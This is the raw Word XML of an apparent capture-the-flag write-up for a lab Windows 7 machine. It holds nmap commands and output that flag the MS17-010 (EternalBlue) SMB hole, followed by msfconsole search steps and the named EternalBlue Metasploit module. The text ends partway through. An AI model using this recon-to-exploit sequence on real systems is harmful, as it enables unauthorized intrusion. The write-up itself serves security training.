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B9E3A" w14:textId="5AA11759" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -p-</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -A 10.10.73.63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91F435" w14:textId="5635818A" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap reveals multiple possible leads, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>but the really high ones seem kind of distracting</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D58141" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7485374D" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>PORT      STATE SERVICE        VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A76D59" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>135/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731ACA38" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">    Microsoft Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65CCACD8" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">-ds   Windows 7 Professional 7601 Service Pack 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-ds (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780FC6E3" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>3389/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">  open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>wbt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DEC4D" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-date: 2025-01-12T17:42:36+00:00; -10m34s from scanner time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186F06F0" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>49152/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669EB2B" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>49153/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586FC37C" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>49154/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB576B" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>49158/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0280C9AE" w14:textId="124588E1" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>49159/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">          Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1BD58A" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="05455394" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="760663D4" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30AEBA" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC195E" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|_smb-vuln-ms10-054: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51561878" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF58DF4" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">| smb-vuln-ms17-010: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D53CC17" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|   VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C97155" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DC80F" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|     State: VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0BCCA" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">|     IDs:  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>CVE:CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39178D51" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:lastRenderedPageBreak/>
        <w:t>|     Risk factor: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579520AF" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|       A critical remote code execution vulnerability exists in Microsoft SMBv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13C5A0" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|        servers (ms17-010).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04913BC2" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Disclosure date: 2017-03-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE3088" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>|     References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625BAA03" w14:textId="71821A7A" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">|       </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00105534">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31C7A7B4" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="666CF8AE" w14:textId="675F1230" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">(doing a second </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> looking for common vuln scripts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216AFAC" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> --script vuln -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> scanBlue.txt 10.10.73.63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54585B" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="195266A1" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280A921" w14:textId="70F02C41" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:t>Scan’s relevant portion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7BF40" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92FF2F"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:color w:val="92FF2F"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33832FDF" w14:textId="5560B55E" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92FF2F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:color w:val="92FF2F"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937EC02" w14:textId="6C70AFCC" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34609D03" wp14:editId="7360E935">
            <wp:extent cx="5172075" cy="3139162"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="13297709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79223" cy="3143500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165C113" w14:textId="288FE20D" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>an c</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">onfirm that this exists in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">, so we might have access to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> option. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE5BE9" w14:textId="3906A10E" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="77ACC027" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="39549899" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6EE5F1" w14:textId="32DFD089" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>(trying the official title first ms17-010</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22784FE1" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Search name:ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D31FE" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="3593D383" w14:textId="179F5CB7" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79745ADF" wp14:editId="69B6747A">
            <wp:extent cx="5943600" cy="1797685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18926024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797685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03261459" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="4D7108A2" w14:textId="4F4FDA01" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">The vulnerability report says it deals with SMB servers, but my pervious scan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> include that. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0903F" w14:textId="34EA9951" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">(ran into error trying to run double pulsar, another Metasploit module that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> work here, omitted due to being irrelevant, but know that endurance is something I called upon for my approach to this challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464FB6F" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>First block of first hour done,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06A80B" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">Intended exploit for this room is the first one that appears when looking up “eternal blue” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09103B2C" w14:textId="186DE731" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>/ms17_010_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>eternalblue  is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the target module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69716F76" wp14:editId="471C0162">
